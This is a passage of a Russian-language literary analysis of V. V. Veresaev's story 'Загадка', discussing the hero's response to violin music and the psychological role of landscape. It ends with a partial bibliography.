Кульминационным в рассказе является эпизод восприятия героем музыки, которая показалась ему начале «грубым оскорблением окружающему», так как звуки лились робко и неуверенно. Автор показывает, как меняется звучание скрипки: «сдерживаемые рыдания» сменяются «резкими – бешеными звуками, перебивающими друг друга».
Этот аккорд воспринимается героем как освобождение пленника. Обращает на себя внимание выразительное сравнение: как будто в этот момент все меняется в герое. Он, задержав дыхание, слушает, и природа для него оживает: «ночь молчала и тоже прислушивалась к вихрю чуждых ей, страстных, негодующих звуков». Огромное количество олицетворений, метафор создают образ таинственной жизни, вечно движущейся и одухотворенной. Теперь для героя природа есть «прекрасный беззвучный аккомпанемент к тем боровшимся, страдавшим звукам». Он осмысливает красоту человека, существующую рядом с той, «по-прежнему далекой, по-прежнему непонятной и недоступной красотой природы». Разум героя откликается, и он открывает великую тайну и загадку ночной природы, которая сливается в его сознании с красотой искусства.
Итак, анализ некоторых особенностей рассказа В. В. Вересаева «Загадка» позволяет сделать выводы о стиле писателя: Вересаев сосредоточен на изображении внутренних процессов, психологии человека, особое место в рассказе занимает пейзаж, который создается выразительными эпитетами, метафорами, олицетворениями.
Пейзажные зарисовки выполняют психологическую функцию, они помогают раскрыть внутренний конфликт героя. В финале автор подводит читателя к идее, что человек – дитя природы, рассудочность, порожденной цивилизацией, подавляет в нем светлые стороны, но он, все-таки, способен
Бровман Г.А. В.В. Вересаев. – М.: Советский писатель, 1959. - 366 с.
Введение в литературоведение/ Под ред. Л.В. Чернец. – М.: Высшая школа, 2006. – 680 с.
Гейзер И.М. В.В. Вересаев. Писатель-врач. – М.; 1957. – 146 с.
Литературный энциклопедический словарь/ Под ред. П. Николаева. – М.;
Ожегов С.И. Толковый словарь русского языка. –
Шайтанов И.О. Федор Иванович Тютчев: поэтическое открытие природы. – М.: МГУ, 1998.
Читайте также: